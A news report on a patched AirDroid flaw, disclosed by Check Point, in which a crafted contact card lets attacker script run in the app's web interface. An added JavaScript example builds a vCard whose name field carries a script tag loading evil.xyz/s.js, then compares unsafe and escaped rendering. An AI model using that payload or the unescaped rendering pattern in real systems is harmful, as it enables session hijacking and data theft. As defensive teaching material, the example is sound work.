A critical vulnerability affecting the roughly 50 million Android users of the popular AirDroid application has been patched. AirDroid, an app that lets you link an Android device to a computer and send SMS messages, run apps and add contacts from a web browser over Wi-Fi, released the patch Jan. 29.
Check Point security researchers disclosed the AirDroid vulnerability on Thursday, issuing an alert that outlined how attackers could steal data from unsuspecting users. The attack begins with an SMS message carrying what appears to be a legitimate contact card (vCard). When the user saves the contact to the device, the attacker's payload embedded in that contact is in a position to trigger a vulnerability in the AirDroid application, according to the Check Point report.
“Once exploited, the app enables the attackers to execute code on the device in order to steal data and send it back to their servers,” wrote Oded Vanunu, security research group manager at Check Point and author of the report, adding that an attacker must obtain a valid session token and use the AirDroid API in an attack.
California-based Sand Studio, the publisher of AirDroid, pushed out a security patch (AirDroid version 3.2.0) three weeks ago. The company did not reply to a request for comment. Check Point advises AirDroid users to update the application immediately.
“All an attacker needs is the phone number associated with the targeted account. Once that phone number is obtained, the attacker needs to share a contact card with the target, and get the target to add it to his or her phone book,” Vanunu wrote.
Once the user receives a text message from that new contact, the attacker's script (located, in the example given, at evil.xyz/s.js) is loaded and executed inside the AirDroid web page.
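The rendering mistake that lets a contact card carry code, shown as an added example that is not AirDroid's code and does not reproduce Check Point's proof of concept: the article does not say which vCard field carried the payload, so the example assumes the formatted name (FN), uses the evil.xyz/s.js host only as a placeholder, and renders a message the way a web UI would with and without output encoding.

```javascript
// Added example (not AirDroid's code): a constructed vCard whose contact name
// carries an HTML payload, rendered into message markup with and without
// output encoding. The FN field and the evil.xyz host are assumptions.

// Constructed vCard, as an attacker might send it: the display name is an
// HTML fragment that pulls a remote script if it reaches the page unescaped.
const MALICIOUS_VCARD = [
  "BEGIN:VCARD",
  "VERSION:3.0",
  'FN:Alice<script src="https://evil.xyz/s.js"></script>',
  "TEL:+15551234567",
  "END:VCARD",
].join("\r\n");

// Minimal parser: returns the first FN (formatted name) and TEL, after
// unfolding continuation lines (a line that starts with a space or tab
// continues the previous one, per RFC 6350).
function parseVCard(text) {
  const unfolded = text.replace(/\r?\n[ \t]/g, "");
  const card = { fn: "", tel: "" };
  for (const line of unfolded.split(/\r?\n/)) {
    const idx = line.indexOf(":");
    if (idx < 0) continue;
    const prop = line.slice(0, idx).split(";")[0].toUpperCase();
    const value = line.slice(idx + 1);
    if (prop === "FN" && !card.fn) card.fn = value;
    if (prop === "TEL" && !card.tel) card.tel = value;
  }
  return card;
}

// Vulnerable pattern: untrusted contact data is concatenated straight into
// markup. Assembled into the page (server-side template, document.write,
// or a client template engine that does not escape), the script element
// loads evil.xyz/s.js inside the app's origin, with the app's session.
function renderMessageUnsafe(contact, body) {
  return `<div class="msg"><span class="from">${contact.fn}</span>` +
         `<span class="body">${body}</span></div>`;
}

// Hardened pattern: encode every untrusted value for an HTML text context
// before it touches markup.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

function renderMessageSafe(contact, body) {
  return `<div class="msg"><span class="from">${escapeHtml(contact.fn)}</span>` +
         `<span class="body">${escapeHtml(body)}</span></div>`;
}

// True when the rendered markup still contains a live tag from the contact
// name, i.e. the injection survived rendering.
function injectionSurvives(html) {
  return /<script\b/i.test(html);
}

const contact = parseVCard(MALICIOUS_VCARD);
console.log("unsafe render, injection survives:", injectionSurvives(renderMessageUnsafe(contact, "hi")));
console.log("safe render,   injection survives:", injectionSurvives(renderMessageSafe(contact, "hi")));
```

One caveat for anyone reproducing this in a browser: markup assigned through innerHTML does not execute `<script>` elements, but event-handler attributes inserted the same way (for example an onerror handler on an img) do run, so the contact name must be escaped, or set through textContent, regardless of how the markup reaches the DOM.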
“The main threat is a complete theft of private information – imagine, for example, that just receiving an SMS message can result in all of the user’s data being stolen. Another threat is that an attacker could control the content of the target’s device,” Vanunu wrote. With a valid session token in hand, an attacker can use the AirDroid API to take complete control of the user’s Android device.
According to Check Point, the malicious contact card can also be delivered through any messaging app, including WhatsApp, as well as by email.
In April, AirDroid patched an authentication flaw that could give attackers remote control over a connected Android device. In 2013, AirDroid patched a vulnerability that allowed an attacker to perform DoS attacks from an Android device.